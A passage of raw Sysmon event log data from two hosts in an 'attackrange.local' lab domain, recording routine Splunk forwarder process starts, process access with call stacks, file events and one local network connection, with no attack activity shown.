Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106674Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:59.398{58E9C193-B47F-615A-3202-00000000FC01}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000106673Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:59.128{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=545C18970AFE4FCF6032B5ED6CE6D1AB,SHA256=24AA945F0D80A7F235DD37490005619B1F418FADBBCB7F3F7E668E31B84AEA3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106672Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:59.128{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50D00C5C5274BA299FB7A7410BC78800,SHA256=81D8AEA3CFB25C0FA34B1227F68A1E141A8864381713792272154C8A41582E9E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083099Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:59.010{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B47F-615A-8701-00000000FD01}3512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083098Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:59.010{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083097Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:59.010{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083096Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:59.010{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083095Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:59.010{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083094Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:59.010{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083093Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:59.010{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083092Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:59.010{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083091Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:59.010{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083090Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:59.010{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083089Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:59.010{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B47F-615A-8701-00000000FD01}3512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083088Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:59.010{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B47F-615A-8701-00000000FD01}3512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083087Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:59.011{2FDD8D40-B47F-615A-8701-00000000FD01}3512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000106695Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:00.964{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69B10D3F5CC2C5A7297CBD8C155A9425,SHA256=50D8512A4E6D242BB973250F7989A079B2A00ACF943B27771C7F2ED1DF3AD1B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083104Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:00.416{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD08F9FF65502DCEEE8BF840A52654D1,SHA256=CE8FA44480CAE6E5037AA0C5E6CAEBEB6EBBC6E401DFFA52E4ED80020F36B012,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106694Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:00.412{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=545C18970AFE4FCF6032B5ED6CE6D1AB,SHA256=24AA945F0D80A7F235DD37490005619B1F418FADBBCB7F3F7E668E31B84AEA3A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106693Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:00.347{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B480-615A-3302-00000000FC01}4192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106692Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:00.345{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106691Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:00.345{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106690Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:00.345{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106689Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:00.345{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106688Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:00.345{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B480-615A-3302-00000000FC01}4192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106687Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:00.344{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B480-615A-3302-00000000FC01}4192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106686Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:00.344{58E9C193-B480-615A-3302-00000000FC01}4192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083103Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:00.244{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BF36DAB4CCCB062C9C9D917CA141FAFD,SHA256=EAE5B323DD06C4B23D22A503F6B88CC1FB6392CB85AB032A754F11F395EFE26D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083102Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:00.244{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7BF4DCF456561E1A03C6BC18DEDAB1FC,SHA256=37C5435928E465A360AF650D50C7104B18A957D100C303E7FB9EC4862F5E5775,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083101Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:57.705{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50139-false10.0.1.12-8000- 